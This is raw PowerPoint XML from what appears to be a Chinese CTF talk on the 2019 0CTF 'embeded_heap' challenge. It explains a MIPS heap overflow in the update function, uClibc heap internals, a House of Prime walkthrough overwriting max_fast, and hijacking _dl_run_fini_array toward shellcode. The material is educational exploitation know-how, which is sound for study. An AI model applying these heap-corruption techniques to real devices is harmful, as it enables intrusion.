          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5417820" y="2056130"/>
            <a:ext cx="847090" cy="847090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5417820" y="3850640"/>
            <a:ext cx="847090" cy="847090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590165" y="1186180"/>
            <a:ext cx="6185535" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3009900" y="2764790"/>
            <a:ext cx="5662930" cy="1207770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5269865" y="4522470"/>
            <a:ext cx="1148080" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="7740000">
            <a:off x="5288915" y="617855"/>
            <a:ext cx="847090" cy="847090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587875" y="535305"/>
            <a:ext cx="1287780" cy="306705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>sigjmp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>结构体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="135890" y="2270760"/>
            <a:ext cx="7058025" cy="2319020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2529840" y="1205230"/>
            <a:ext cx="6362700" cy="9867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考点：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. mips </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆溢出利用； </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. uClibc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆管理机制。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2019 0ctf - embeded_heap</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数存在堆溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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程序分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞点分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3637280" y="1389380"/>
            <a:ext cx="5196205" cy="3214370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3637280" y="93980"/>
            <a:ext cx="3914140" cy="4778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精简版本的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，也可以看作是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低版本 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）。代码位置：</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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>过程与 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>glibc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相同。</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uClibc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆管理机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>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2599690" y="2590165"/>
            <a:ext cx="5035550" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224655" y="1050290"/>
            <a:ext cx="4632325" cy="1000760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5445125" y="2046605"/>
            <a:ext cx="3381375" cy="266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echo $USER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="5825490" cy="92202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安恒研究院海特实验室 IOT 安全研究员，主要研究方向为 IOT 设备固件安全，挖掘过 tplink、dlink、tenda、draytek、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ruckus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 等设备的 0day 漏洞</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2019 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 360 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>黑客马拉松设备破解赛第一名</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钟文洁 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- H4lo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6930390" y="1532255"/>
            <a:ext cx="1734185" cy="17341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修改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>max_fast </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的为一个大值并篡改堆块 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值</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在下次 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一个堆块时，可以向一定范围内的地址中写入堆地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"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House of Prime</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7533005" y="1066800"/>
            <a:ext cx="1054100" cy="1054100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="53975" y="2684145"/>
            <a:ext cx="6085840" cy="2182495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5306695" y="2253615"/>
            <a:ext cx="3743325" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="53000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将堆块的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>值置为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，得到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fastbin_index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1</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free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>掉此堆块 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p1</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max_fast = av-&gt;fastbins[-1]</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>*max_fast = &amp;p1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4263390" y="2926080"/>
            <a:ext cx="952500" cy="952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indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_dl_app_fini_array -&gt; _dl_run_fini_array</a:t>
            </a:r>
            <a:endParaRPr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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>_dl_run_fini_array</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054100" y="2759075"/>
            <a:ext cx="7928610" cy="20770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6" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获取堆地址之后调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>功能，溢出到下一个堆块 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk2</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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
